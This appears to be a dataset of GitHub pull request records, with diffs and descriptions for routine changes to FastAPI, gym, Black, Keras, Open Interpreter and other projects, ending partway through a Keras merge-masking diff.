<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details>
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)</sub>
### 🌟 Summary
Updated link checker GitHub Action to latest version.
### 📊 Key Changes
- Upgraded `lycheeverse/lychee-action` from `v1.6.1` to `v1.7.0` in the workflow file.
### 🎯 Purpose & Impact
- 🚀 **Purpose**: Ensure the link-checking action used in the repository's workflows is up-to-date with the latest features and fixes.
- ✨ **Impact**: Improved link-checking reliability and performance for the project's documentation, potentially leading to a better maintenance process and user experience.
|
https://api.github.com/repos/ultralytics/yolov5/pulls/11427
|
2023-04-24T04:58:41Z
|
2023-04-24T15:14:32Z
|
2023-04-24T15:14:32Z
|
2024-01-19T02:06:21Z
| 284
|
ultralytics/yolov5
| 25,378
|
✨ Add allow disabling `redirect_slashes` at the FastAPI app level
|
diff --git a/fastapi/applications.py b/fastapi/applications.py
index 298aca921d70c..9b161c5ec832f 100644
--- a/fastapi/applications.py
+++ b/fastapi/applications.py
@@ -62,6 +62,7 @@ def __init__(
servers: Optional[List[Dict[str, Union[str, Any]]]] = None,
dependencies: Optional[Sequence[Depends]] = None,
default_response_class: Type[Response] = Default(JSONResponse),
+ redirect_slashes: bool = True,
docs_url: Optional[str] = "/docs",
redoc_url: Optional[str] = "/redoc",
swagger_ui_oauth2_redirect_url: Optional[str] = "/docs/oauth2-redirect",
@@ -127,6 +128,7 @@ def __init__(
self.dependency_overrides: Dict[Callable[..., Any], Callable[..., Any]] = {}
self.router: routing.APIRouter = routing.APIRouter(
routes=routes,
+ redirect_slashes=redirect_slashes,
dependency_overrides_provider=self,
on_startup=on_startup,
on_shutdown=on_shutdown,
diff --git a/tests/test_router_redirect_slashes.py b/tests/test_router_redirect_slashes.py
new file mode 100644
index 0000000000000..086665c040ab4
--- /dev/null
+++ b/tests/test_router_redirect_slashes.py
@@ -0,0 +1,40 @@
+from fastapi import APIRouter, FastAPI
+from fastapi.testclient import TestClient
+
+
+def test_redirect_slashes_enabled():
+ app = FastAPI()
+ router = APIRouter()
+
+ @router.get("/hello/")
+ def hello_page() -> str:
+ return "Hello, World!"
+
+ app.include_router(router)
+
+ client = TestClient(app)
+
+ response = client.get("/hello/", follow_redirects=False)
+ assert response.status_code == 200
+
+ response = client.get("/hello", follow_redirects=False)
+ assert response.status_code == 307
+
+
+def test_redirect_slashes_disabled():
+ app = FastAPI(redirect_slashes=False)
+ router = APIRouter()
+
+ @router.get("/hello/")
+ def hello_page() -> str:
+ return "Hello, World!"
+
+ app.include_router(router)
+
+ client = TestClient(app)
+
+ response = client.get("/hello/", follow_redirects=False)
+ assert response.status_code == 200
+
+ response = client.get("/hello", follow_redirects=False)
+ assert response.status_code == 404
|
Right now the `redirect_slashes` parameter in sub-routers created with `APIRouter` is ignored, because only the main router's `redirect_slashes` inside the FastAPI class is taken into account. The FastAPI class creates a new router without a `redirect_slashes` argument, which is why the router always uses the default value `redirect_slashes=True` and always redirects on trailing slashes.
https://github.com/tiangolo/fastapi/blob/master/fastapi/applications.py#L69
Here is how to reproduce this problem
```python
from fastapi import FastAPI
from fastapi.routing import APIRouter
router = APIRouter(redirect_slashes=False)
@router.get('/hello/')
def hello_page() -> str:
return 'Hello, World!'
app = FastAPI()
app.include_router(router)
```
And if you request the page `http://127.0.0.1:8000/hello` (without a trailing slash), you will be redirected even with `redirect_slashes=False`:
```bash
uvicorn main:app
INFO: Started server process [96046]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)
INFO: 127.0.0.1:57330 - "GET /hello HTTP/1.1" 307 Temporary Redirect
INFO: 127.0.0.1:57330 - "GET /hello/ HTTP/1.1" 200 OK
```
I added `redirect_slashes` to the `__init__` method of the FastAPI class and passed it to the router's constructor.
That way the trailing-slash redirect behaviour can be changed globally for the application instance.
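With the change applied, the reproduction above flips its behaviour; a minimal sketch mirroring the new test in the diff:
```python
from fastapi import APIRouter, FastAPI
from fastapi.testclient import TestClient

app = FastAPI(redirect_slashes=False)  # new app-level keyword from this PR
router = APIRouter()

@router.get("/hello/")
def hello_page() -> str:
    return "Hello, World!"

app.include_router(router)
client = TestClient(app)
print(client.get("/hello", follow_redirects=False).status_code)  # 404 instead of 307
```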
|
https://api.github.com/repos/tiangolo/fastapi/pulls/3432
|
2021-06-29T19:11:10Z
|
2023-06-22T10:37:51Z
|
2023-06-22T10:37:51Z
|
2023-06-22T10:37:52Z
| 574
|
tiangolo/fastapi
| 23,373
|
Py36+ syntax in gym/*.py
|
diff --git a/gym/core.py b/gym/core.py
index ae7b32c3557..7b316b1cea0 100644
--- a/gym/core.py
+++ b/gym/core.py
@@ -5,7 +5,7 @@
from gym.utils import closer
-class Env(object):
+class Env:
"""The main OpenAI Gym class. It encapsulates an environment with
arbitrary behind-the-scenes dynamics. An environment can be
partially or fully observed.
@@ -149,9 +149,9 @@ def unwrapped(self):
def __str__(self):
if self.spec is None:
- return "<{} instance>".format(type(self).__name__)
+ return f"<{type(self).__name__} instance>"
else:
- return "<{}<{}>>".format(type(self).__name__, self.spec.id)
+ return f"<{type(self).__name__}<{self.spec.id}>>"
def __enter__(self):
"""Support with-statement for the environment."""
@@ -232,9 +232,7 @@ def __init__(self, env):
def __getattr__(self, name):
if name.startswith("_"):
- raise AttributeError(
- "attempted to get missing private attribute '{}'".format(name)
- )
+ raise AttributeError(f"attempted to get missing private attribute '{name}'")
return getattr(self.env, name)
@property
@@ -304,7 +302,7 @@ def compute_reward(self, achieved_goal, desired_goal, info):
return self.env.compute_reward(achieved_goal, desired_goal, info)
def __str__(self):
- return "<{}{}>".format(type(self).__name__, self.env)
+ return f"<{type(self).__name__}{self.env}>"
def __repr__(self):
return str(self)
diff --git a/gym/error.py b/gym/error.py
index 5884e5911b4..6829ea62638 100644
--- a/gym/error.py
+++ b/gym/error.py
@@ -96,7 +96,7 @@ def __init__(
json_body=None,
headers=None,
):
- super(APIError, self).__init__(message)
+ super().__init__(message)
if http_body and hasattr(http_body, "decode"):
try:
@@ -117,7 +117,7 @@ def __init__(
def __unicode__(self):
if self.request_id is not None:
msg = self._message or "<empty message>"
- return u"Request {0}: {1}".format(self.request_id, msg)
+ return f"Request {self.request_id}: {msg}"
else:
return self._message
@@ -142,9 +142,7 @@ def __init__(
json_body=None,
headers=None,
):
- super(InvalidRequestError, self).__init__(
- message, http_body, http_status, json_body, headers
- )
+ super().__init__(message, http_body, http_status, json_body, headers)
self.param = param
@@ -194,7 +192,7 @@ class AlreadyPendingCallError(Exception):
"""
def __init__(self, message, name):
- super(AlreadyPendingCallError, self).__init__(message)
+ super().__init__(message)
self.name = name
@@ -205,7 +203,7 @@ class NoAsyncCallError(Exception):
"""
def __init__(self, message, name):
- super(NoAsyncCallError, self).__init__(message)
+ super().__init__(message)
self.name = name
diff --git a/gym/logger.py b/gym/logger.py
index 89ee21fe3f1..a519a48e5c9 100644
--- a/gym/logger.py
+++ b/gym/logger.py
@@ -22,18 +22,18 @@ def set_level(level):
def debug(msg, *args):
if MIN_LEVEL <= DEBUG:
- print("%s: %s" % ("DEBUG", msg % args), file=sys.stderr)
+ print(f"DEBUG: {msg % args}", file=sys.stderr)
def info(msg, *args):
if MIN_LEVEL <= INFO:
- print("%s: %s" % ("INFO", msg % args), file=sys.stderr)
+ print(f"INFO: {msg % args}", file=sys.stderr)
def warn(msg, *args, category=None, stacklevel=1):
if MIN_LEVEL <= WARN:
warnings.warn(
- colorize("%s: %s" % ("WARN", msg % args), "yellow"),
+ colorize(f"WARN: {msg % args}", "yellow"),
category=category,
stacklevel=stacklevel + 1,
)
@@ -45,7 +45,7 @@ def deprecation(msg, *args):
def error(msg, *args):
if MIN_LEVEL <= ERROR:
- print(colorize("%s: %s" % ("ERROR", msg % args), "red"), file=sys.stderr)
+ print(colorize(f"ERROR: {msg % args}", "red"), file=sys.stderr)
# DEPRECATED:
|
This PR upgrades the syntax to use py36+ idioms in gym/*.py (no subfolders), as suggested in #2462.
It was derived automatically by running `pyupgrade --py36-plus` and `flynt -ll 120`; no manual modifications were made.
Quality control: visual inspection of the diff; unit tests pass.
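For illustration, the kind of rewrite these tools apply (the values are made up; the pattern follows the diff):
```python
name, spec_id = "Env", "CartPole-v1"

old = "<{}<{}>>".format(name, spec_id)  # pre-3.6 style
new = f"<{name}<{spec_id}>>"            # f-string form emitted by flynt
assert old == new
```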
|
https://api.github.com/repos/openai/gym/pulls/2473
|
2021-10-30T14:49:40Z
|
2021-11-14T13:50:40Z
|
2021-11-14T13:50:40Z
|
2021-11-14T13:50:40Z
| 1,132
|
openai/gym
| 5,627
|
Support OpenAI's new models.
|
diff --git a/interpreter/terminal_interface/start_terminal_interface.py b/interpreter/terminal_interface/start_terminal_interface.py
index 00471c931..a7f53e95f 100644
--- a/interpreter/terminal_interface/start_terminal_interface.py
+++ b/interpreter/terminal_interface/start_terminal_interface.py
@@ -357,15 +357,15 @@ def start_terminal_interface(interpreter):
### Set some helpful settings we know are likely to be true
- if interpreter.llm.model == "gpt-4-1106-preview":
+ if interpreter.llm.model.startswith("gpt-4") or interpreter.llm.model.startswith("openai/gpt-4"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 128000
if interpreter.llm.max_tokens is None:
interpreter.llm.max_tokens = 4096
if interpreter.llm.supports_functions is None:
- interpreter.llm.supports_functions = True
+ interpreter.llm.supports_functions = False if "vision" in interpreter.llm.model else True
- if interpreter.llm.model == "gpt-3.5-turbo-1106":
+ if interpreter.llm.model.startswith("gpt-3.5-turbo") or interpreter.llm.model.startswith("openai/gpt-3.5-turbo"):
if interpreter.llm.context_window is None:
interpreter.llm.context_window = 16000
if interpreter.llm.max_tokens is None:
|
### Describe the changes you have made:
Add default context window and max tokens configs for OpenAI's new models: `gpt-4-turbo-preview`, `gpt-4-0125-preview`, and `gpt-4-1106-vision-preview` (a short sketch is included at the end of this description).
### Reference any relevant issues (e.g. "Fixes #000"):
If we can keep these configs updated for as many models as possible, we can maybe avoid issues like #915.
### Pre-Submission Checklist (optional but appreciated):
- [x] I have included relevant documentation updates (stored in /docs)
- [x] I have read `docs/CONTRIBUTING.md`
- [x] I have read `docs/ROADMAP.md`
### OS Tests (optional but appreciated):
- [x] Tested on Windows
- [x] Tested on MacOS
- [x] Tested on Linux
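For reference, a sketch of the prefix-based defaults this adds (values taken from the patch; the model name is just an example):
```python
model = "openai/gpt-4-0125-preview"

if model.startswith(("gpt-4", "openai/gpt-4")):
    context_window = 128000
    max_tokens = 4096
    supports_functions = "vision" not in model

print(context_window, max_tokens, supports_functions)  # 128000 4096 True
```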
|
https://api.github.com/repos/OpenInterpreter/open-interpreter/pulls/1099
|
2024-03-19T07:05:22Z
|
2024-03-24T07:49:41Z
|
2024-03-24T07:49:41Z
|
2024-03-24T07:53:04Z
| 322
|
OpenInterpreter/open-interpreter
| 40,686
|
Added professional events
|
diff --git a/README.md b/README.md
index da7fb015..1c775d4b 100644
--- a/README.md
+++ b/README.md
@@ -12,6 +12,8 @@ Further resources:
* For a list of free machine learning books available for download, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/books.md).
+* For a list of professional machine learning events, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/events.md).
+
* For a list of (mostly) free machine learning courses available online, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/courses.md).
* For a list of blogs and newsletters on data science and machine learning, go [here](https://github.com/josephmisiti/awesome-machine-learning/blob/master/blogs.md).
diff --git a/events.md b/events.md
new file mode 100644
index 00000000..5691233c
--- /dev/null
+++ b/events.md
@@ -0,0 +1,5 @@
+The following is a list of professional events on Machine Learning and Artificial Intelligence
+
+## Machine Learning and Artificial Intelligence
+
+* [AI & ML Events](https://aiml.events) - The best upcoming hand-picked conferences and exhibitions in the field of artificial intelligence and machine learning
|
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/659
|
2020-01-05T09:33:02Z
|
2020-01-27T14:57:05Z
|
2020-01-27T14:57:05Z
|
2020-01-27T14:57:05Z
| 310
|
josephmisiti/awesome-machine-learning
| 51,755
|
|
[NFC] polish colossalai/amp/naive_amp/_fp16_optimizer.py code style
|
diff --git a/colossalai/amp/naive_amp/_fp16_optimizer.py b/colossalai/amp/naive_amp/_fp16_optimizer.py
index 58d9e3df116e..b01a3cbf0108 100644
--- a/colossalai/amp/naive_amp/_fp16_optimizer.py
+++ b/colossalai/amp/naive_amp/_fp16_optimizer.py
@@ -9,14 +9,16 @@
except:
print('Colossalai should be built with cuda extension to use the FP16 optimizer')
+from torch.distributed import ProcessGroup
from torch.optim import Optimizer
-from colossalai.core import global_context as gpc
+
from colossalai.context import ParallelMode
+from colossalai.core import global_context as gpc
from colossalai.logging import get_dist_logger
-from colossalai.utils import (copy_tensor_parallel_attributes, clip_grad_norm_fp32, multi_tensor_applier)
-from torch.distributed import ProcessGroup
-from .grad_scaler import BaseGradScaler
+from colossalai.utils import clip_grad_norm_fp32, copy_tensor_parallel_attributes, multi_tensor_applier
+
from ._utils import has_inf_or_nan, zero_gard_by_list
+from .grad_scaler import BaseGradScaler
__all__ = ['FP16Optimizer']
@@ -41,7 +43,7 @@ def _multi_tensor_copy_this_to_that(this, that, overflow_buf=None):
class FP16Optimizer(Optimizer):
"""Float16 optimizer for fp16 and bf16 data types.
-
+
Args:
optimizer (torch.optim.Optimizer): base optimizer such as Adam or SGD
grad_scaler (BaseGradScaler): grad scaler for gradient chose in
|
- [NFC] polish colossalai/amp/naive_amp/_fp16_optimizer.py code style
|
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/1819
|
2022-11-08T06:42:45Z
|
2022-11-08T07:07:02Z
|
2022-11-08T07:07:02Z
|
2022-11-08T07:07:02Z
| 372
|
hpcaitech/ColossalAI
| 11,497
|
make error message on accessing private attributes more representative
|
diff --git a/gym/core.py b/gym/core.py
index f335b9f60ab..e8d2ff0f282 100644
--- a/gym/core.py
+++ b/gym/core.py
@@ -225,7 +225,7 @@ def __init__(self, env: Env):
def __getattr__(self, name):
if name.startswith("_"):
- raise AttributeError(f"attempted to get missing private attribute '{name}'")
+ raise AttributeError(f"accessing private attribute '{name}' is prohibited")
return getattr(self.env, name)
@property
|
This error message was kinda misleading.
The code checks whether a private attribute is being accessed and then raises an error.
|
https://api.github.com/repos/openai/gym/pulls/2714
|
2022-03-23T15:55:40Z
|
2022-03-24T18:10:07Z
|
2022-03-24T18:10:07Z
|
2022-03-24T18:10:07Z
| 132
|
openai/gym
| 5,000
|
📝 Update release notes, move and check latest-changes
|
diff --git a/docs/en/docs/release-notes.md b/docs/en/docs/release-notes.md
index b0c13f5af0d51..186d2117cc16b 100644
--- a/docs/en/docs/release-notes.md
+++ b/docs/en/docs/release-notes.md
@@ -7,6 +7,8 @@ hide:
## Latest Changes
+### Internal
+
* 👷 Upgrade latest-changes GitHub Action. PR [#10587](https://github.com/tiangolo/fastapi/pull/10587) by [@tiangolo](https://github.com/tiangolo).
## 0.104.1
|
📝 Update release notes, move and check latest-changes
|
https://api.github.com/repos/tiangolo/fastapi/pulls/10588
|
2023-11-04T01:58:51Z
|
2023-11-04T02:02:18Z
|
2023-11-04T02:02:18Z
|
2023-11-04T02:02:19Z
| 135
|
tiangolo/fastapi
| 23,289
|
Use lowercase hex numbers fixes #1692
|
diff --git a/.gitignore b/.gitignore
index 3207e72ae28..30225ec7764 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
+.venv
.coverage
_build
.DS_Store
@@ -15,4 +16,4 @@ src/_black_version.py
.dmypy.json
*.swp
.hypothesis/
-venv/
\ No newline at end of file
+venv/
diff --git a/CHANGES.md b/CHANGES.md
index 240abe302a4..67697bd7b07 100644
--- a/CHANGES.md
+++ b/CHANGES.md
@@ -21,6 +21,8 @@
- Added support for PEP 614 relaxed decorator syntax on python 3.9 (#1711)
+- use lowercase hex strings (#1692)
+
#### _Packaging_
- Self-contained native _Black_ binaries are now provided for releases via GitHub
diff --git a/src/black/__init__.py b/src/black/__init__.py
index 7e13a5d33f5..44edeb0d9f1 100644
--- a/src/black/__init__.py
+++ b/src/black/__init__.py
@@ -5192,31 +5192,52 @@ def normalize_numeric_literal(leaf: Leaf) -> None:
# Leave octal and binary literals alone.
pass
elif text.startswith("0x"):
- # Change hex literals to upper case.
- before, after = text[:2], text[2:]
- text = f"{before}{after.upper()}"
+ text = format_hex(text)
elif "e" in text:
- before, after = text.split("e")
- sign = ""
- if after.startswith("-"):
- after = after[1:]
- sign = "-"
- elif after.startswith("+"):
- after = after[1:]
- before = format_float_or_int_string(before)
- text = f"{before}e{sign}{after}"
+ text = format_scientific_notation(text)
elif text.endswith(("j", "l")):
- number = text[:-1]
- suffix = text[-1]
- # Capitalize in "2L" because "l" looks too similar to "1".
- if suffix == "l":
- suffix = "L"
- text = f"{format_float_or_int_string(number)}{suffix}"
+ text = format_long_or_complex_number(text)
else:
text = format_float_or_int_string(text)
leaf.value = text
+def format_hex(text: str) -> str:
+ """
+ Formats a hexadecimal string like "0x12b3"
+
+ Uses lowercase because of similarity between "B" and "8", which
+ can cause security issues.
+ see: https://github.com/psf/black/issues/1692
+ """
+
+ before, after = text[:2], text[2:]
+ return f"{before}{after.lower()}"
+
+
+def format_scientific_notation(text: str) -> str:
+ """Formats a numeric string utilizing scentific notation"""
+ before, after = text.split("e")
+ sign = ""
+ if after.startswith("-"):
+ after = after[1:]
+ sign = "-"
+ elif after.startswith("+"):
+ after = after[1:]
+ before = format_float_or_int_string(before)
+ return f"{before}e{sign}{after}"
+
+
+def format_long_or_complex_number(text: str) -> str:
+ """Formats a long or complex string like `10L` or `10j`"""
+ number = text[:-1]
+ suffix = text[-1]
+ # Capitalize in "2L" because "l" looks too similar to "1".
+ if suffix == "l":
+ suffix = "L"
+ return f"{format_float_or_int_string(number)}{suffix}"
+
+
def format_float_or_int_string(text: str) -> str:
"""Formats a float string like "1.0"."""
if "." not in text:
diff --git a/src/black_primer/primer.json b/src/black_primer/primer.json
index cdc863ca032..32df01571a7 100644
--- a/src/black_primer/primer.json
+++ b/src/black_primer/primer.json
@@ -10,7 +10,7 @@
},
"attrs": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/python-attrs/attrs.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -47,7 +47,7 @@
},
"hypothesis": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/HypothesisWorks/hypothesis.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -63,7 +63,7 @@
},
"pillow": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/python-pillow/Pillow.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -77,7 +77,7 @@
},
"pyramid": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/Pylons/pyramid.git",
"long_checkout": false,
"py_versions": ["all"]
@@ -112,7 +112,7 @@
},
"virtualenv": {
"cli_arguments": [],
- "expect_formatting_changes": false,
+ "expect_formatting_changes": true,
"git_clone_url": "https://github.com/pypa/virtualenv.git",
"long_checkout": false,
"py_versions": ["all"]
diff --git a/src/blib2to3/pytree.py b/src/blib2to3/pytree.py
index 4b841b768e7..6dba3c7bb15 100644
--- a/src/blib2to3/pytree.py
+++ b/src/blib2to3/pytree.py
@@ -34,7 +34,7 @@
import sys
from io import StringIO
-HUGE: int = 0x7FFFFFFF # maximum repeat count, default max
+HUGE: int = 0x7fffffff # maximum repeat count, default max
_type_reprs: Dict[int, Union[Text, int]] = {}
diff --git a/test_requirements.txt b/test_requirements.txt
index 3e65cdb669f..9f69b8edf83 100644
--- a/test_requirements.txt
+++ b/test_requirements.txt
@@ -2,4 +2,4 @@ pytest >= 6.1.1
pytest-mock >= 3.3.1
pytest-cases >= 2.3.0
coverage >= 5.3
-parameterized >= 0.7.4
\ No newline at end of file
+parameterized >= 0.7.4
diff --git a/tests/data/numeric_literals.py b/tests/data/numeric_literals.py
index 254da68d330..06b7f7758ee 100644
--- a/tests/data/numeric_literals.py
+++ b/tests/data/numeric_literals.py
@@ -12,7 +12,7 @@
x = 123456789E123456789
x = 123456789J
x = 123456789.123456789J
-x = 0XB1ACC
+x = 0Xb1aCc
x = 0B1011
x = 0O777
x = 0.000000006
@@ -36,7 +36,7 @@
x = 123456789e123456789
x = 123456789j
x = 123456789.123456789j
-x = 0xB1ACC
+x = 0xb1acc
x = 0b1011
x = 0o777
x = 0.000000006
diff --git a/tests/data/numeric_literals_py2.py b/tests/data/numeric_literals_py2.py
index 8f85c43f265..8b2c7faa306 100644
--- a/tests/data/numeric_literals_py2.py
+++ b/tests/data/numeric_literals_py2.py
@@ -3,7 +3,7 @@
x = 123456789L
x = 123456789l
x = 123456789
-x = 0xb1acc
+x = 0xB1aCc
# output
@@ -13,4 +13,4 @@
x = 123456789L
x = 123456789L
x = 123456789
-x = 0xB1ACC
+x = 0xb1acc
diff --git a/tests/data/numeric_literals_skip_underscores.py b/tests/data/numeric_literals_skip_underscores.py
index e345bb90276..f83e23312f2 100644
--- a/tests/data/numeric_literals_skip_underscores.py
+++ b/tests/data/numeric_literals_skip_underscores.py
@@ -3,7 +3,7 @@
x = 123456789
x = 1_2_3_4_5_6_7
x = 1E+1
-x = 0xb1acc
+x = 0xb1AcC
x = 0.00_00_006
x = 12_34_567J
x = .1_2
@@ -16,8 +16,8 @@
x = 123456789
x = 1_2_3_4_5_6_7
x = 1e1
-x = 0xB1ACC
+x = 0xb1acc
x = 0.00_00_006
x = 12_34_567j
x = 0.1_2
-x = 1_2.0
\ No newline at end of file
+x = 1_2.0
|
First PR on black. Please tell me if I did something wrong according to your ordinary rules.
The issue, #1692, discusses whether we/you should "simply" do this, as it might impact the source code of a large set of users; however, you can either merge it if you like it or wait if not. :) Please write me if I can do anything in that regard.
I created two separate commits:
- Made hex lower case
- Refactored the numeric formatting section
This was done to separate the two focus points: the first one solves the issue, whereas the second adds a bit of refactoring to that part of the code. Whether my version has higher code quality or not is definitely subjective, so please ignore it and cherry-pick if you dislike it :)
I am looking forward to contributing to black, long time user and all that, so I hope you like it. I'll try to do something once in a while. I am doing this as part of hacktoberfest though, so if you can either label it `hacktoberfest-accepted` or merge it before the end of the month, that would be great ;) I feel super cheap writing that, but I am trying to pimp my bike with a yearly sticker from hacktoberfest, and this month is running a bit short. If any changes are needed, I'll gladly make those :)
Thank you!
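For reference, the new rule in isolation (copied from the diff above):
```python
def format_hex(text: str) -> str:
    """Lowercase the digits of a hex literal like "0x12B3"."""
    before, after = text[:2], text[2:]
    return f"{before}{after.lower()}"

assert format_hex("0xB1ACC") == "0xb1acc"
```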
|
https://api.github.com/repos/psf/black/pulls/1775
|
2020-10-21T16:07:38Z
|
2020-11-13T15:25:18Z
|
2020-11-13T15:25:18Z
|
2020-11-14T10:56:56Z
| 2,288
|
psf/black
| 23,660
|
Fix docs for Command type
|
diff --git a/README.md b/README.md
index 27e8b9ecf..c986e0527 100644
--- a/README.md
+++ b/README.md
@@ -298,7 +298,7 @@ side_effect(old_command: Command, fixed_command: str) -> None
```
and optional `enabled_by_default`, `requires_output` and `priority` variables.
-`Command` has three attributes: `script`, `stdout`, `stderr` and `script_parts`.
+`Command` has four attributes: `script`, `stdout`, `stderr` and `script_parts`.
Rule shouldn't change `Command`.
|

|
https://api.github.com/repos/nvbn/thefuck/pulls/680
|
2017-08-23T06:15:32Z
|
2017-08-23T06:37:13Z
|
2017-08-23T06:37:13Z
|
2017-08-23T06:37:13Z
| 140
|
nvbn/thefuck
| 30,590
|
Small fixes for Neural_Doodle example
|
diff --git a/examples/neural_doodle.py b/examples/neural_doodle.py
index c4133d8fed2..20907893b58 100644
--- a/examples/neural_doodle.py
+++ b/examples/neural_doodle.py
@@ -196,8 +196,8 @@ def load_mask_labels():
for layer in image_model.layers[1:]:
name = 'mask_%s' % layer.name
if 'conv' in layer.name:
- x = AveragePooling2D((3, 3), strides=(
- 1, 1), name=name, border_mode='same')(x)
+ x = AveragePooling2D((3, 3), padding='same', strides=(
+ 1, 1), name=name)(x)
elif 'pool' in layer.name:
x = AveragePooling2D((2, 2), name=name)(x)
mask_model = Model(mask_input, x)
@@ -238,6 +238,7 @@ def region_style_loss(style_image, target_image, style_mask, target_mask):
masked_target = K.permute_dimensions(
target_image, (2, 0, 1)) * target_mask
num_channels = K.shape(style_image)[-1]
+ num_channels = K.cast(num_channels, dtype='float32')
s = gram_matrix(masked_style) / K.mean(style_mask) / num_channels
c = gram_matrix(masked_target) / K.mean(target_mask) / num_channels
return K.mean(K.square(s - c))
|
1) Fixed the type cast in region_style_loss(), which prevented the example from running: K.shape returns int32, but the variable was immediately used in a division that requires float32 (a short sketch of the cast follows below).
```
File "neural_doodle.py", line 241, in region_style_loss
s = gram_matrix(masked_style) / K.mean(style_mask) / num_channels
ValueError: Tensor conversion requested dtype float32 for Tensor with dtype int32: 'Tensor("strided_slice_8:0", shape=(), dtype=int32)'
```
2) Also updated the AveragePooling2D arguments to match the Keras 2 API, using 'padding' instead of the older 'border_mode'.
```
neural_doodle.py:200: UserWarning: Update your `AveragePooling2D` call to the Keras 2 API: `AveragePooling2D((3, 3), padding="same", strides=(1, 1), name="mask_block1_conv1")`
1, 1), name=name, border_mode='same')(x)
```
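A minimal sketch of the first fix, assuming the Keras 2 backend API (the tensor is a placeholder):
```python
import numpy as np
from keras import backend as K

style_image = K.constant(np.zeros((64, 64, 3)))       # placeholder tensor
num_channels = K.shape(style_image)[-1]                # int32 scalar tensor
num_channels = K.cast(num_channels, dtype='float32')   # now usable in float32 division
```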
|
https://api.github.com/repos/keras-team/keras/pulls/6577
|
2017-05-10T11:26:48Z
|
2017-05-11T21:33:40Z
|
2017-05-11T21:33:40Z
|
2017-05-11T21:33:40Z
| 332
|
keras-team/keras
| 47,688
|
Support for masking in merged layers
|
diff --git a/keras/backend/tensorflow_backend.py b/keras/backend/tensorflow_backend.py
index 2616ec6d7b1..833d31019c1 100644
--- a/keras/backend/tensorflow_backend.py
+++ b/keras/backend/tensorflow_backend.py
@@ -339,6 +339,17 @@ def any(x, axis=None, keepdims=False):
return tf.cast(x, tf.uint8)
+def all(x, axis=None, keepdims=False):
+ '''Bitwise reduction (logical AND).
+
+ Returns an uint8 tensor
+ '''
+ axis = _normalize_axis(axis, ndim(x))
+ x = tf.cast(x, tf.bool)
+ x = tf.reduce_all(x, reduction_indices=axis, keep_dims=keepdims)
+ return tf.cast(x, tf.uint8)
+
+
def argmax(x, axis=-1):
'''Returns the index of the maximum value
along a tensor axis.
diff --git a/keras/backend/theano_backend.py b/keras/backend/theano_backend.py
index 8c391e4bb1b..13a21a80493 100644
--- a/keras/backend/theano_backend.py
+++ b/keras/backend/theano_backend.py
@@ -202,6 +202,12 @@ def any(x, axis=None, keepdims=False):
return T.any(x, axis=axis, keepdims=keepdims)
+def all(x, axis=None, keepdims=False):
+ '''Bitwise reduction (logical AND).
+ '''
+ return T.all(x, axis=axis, keepdims=keepdims)
+
+
def argmax(x, axis=-1):
return T.argmax(x, axis=axis, keepdims=False)
diff --git a/keras/engine/topology.py b/keras/engine/topology.py
index 30942286a4e..a26e43982f6 100644
--- a/keras/engine/topology.py
+++ b/keras/engine/topology.py
@@ -1073,9 +1073,12 @@ class Merge(Layer):
tensor_indices: optional list of indices of output tensors
to consider for merging
(in case some input layer node returns multiple tensors).
+ output_mask: mask or lambda/function to compute the output mask (only
+ if merge mode is a lambda/function). If the latter case, it should
+ take as input a list of masks and return a single mask.
'''
def __init__(self, layers=None, mode='sum', concat_axis=-1,
- dot_axes=-1, output_shape=None,
+ dot_axes=-1, output_shape=None, output_mask=None,
node_indices=None, tensor_indices=None, name=None):
self.layers = layers
self.mode = mode
@@ -1085,6 +1088,7 @@ def __init__(self, layers=None, mode='sum', concat_axis=-1,
self.dot_axes = [self.dot_axes, ] * 2
self._output_shape = output_shape
self.node_indices = node_indices
+ self._output_mask = output_mask
# layer parameters
self.inbound_nodes = []
@@ -1093,7 +1097,7 @@ def __init__(self, layers=None, mode='sum', concat_axis=-1,
self.regularizers = []
self.trainable_weights = []
self.non_trainable_weights = []
- self.supports_masking = False
+ self.supports_masking = True
self.uses_learning_phase = False
self.input_spec = None # compatible with whatever
if not name:
@@ -1317,13 +1321,30 @@ def get_output_shape_for(self, input_shape):
elif self.mode == 'cos':
return (input_shapes[0][0], 1)
- def compute_mask(self, input, mask=None):
- '''TODO: add mask merging support
- '''
- if mask is not None and any(mask):
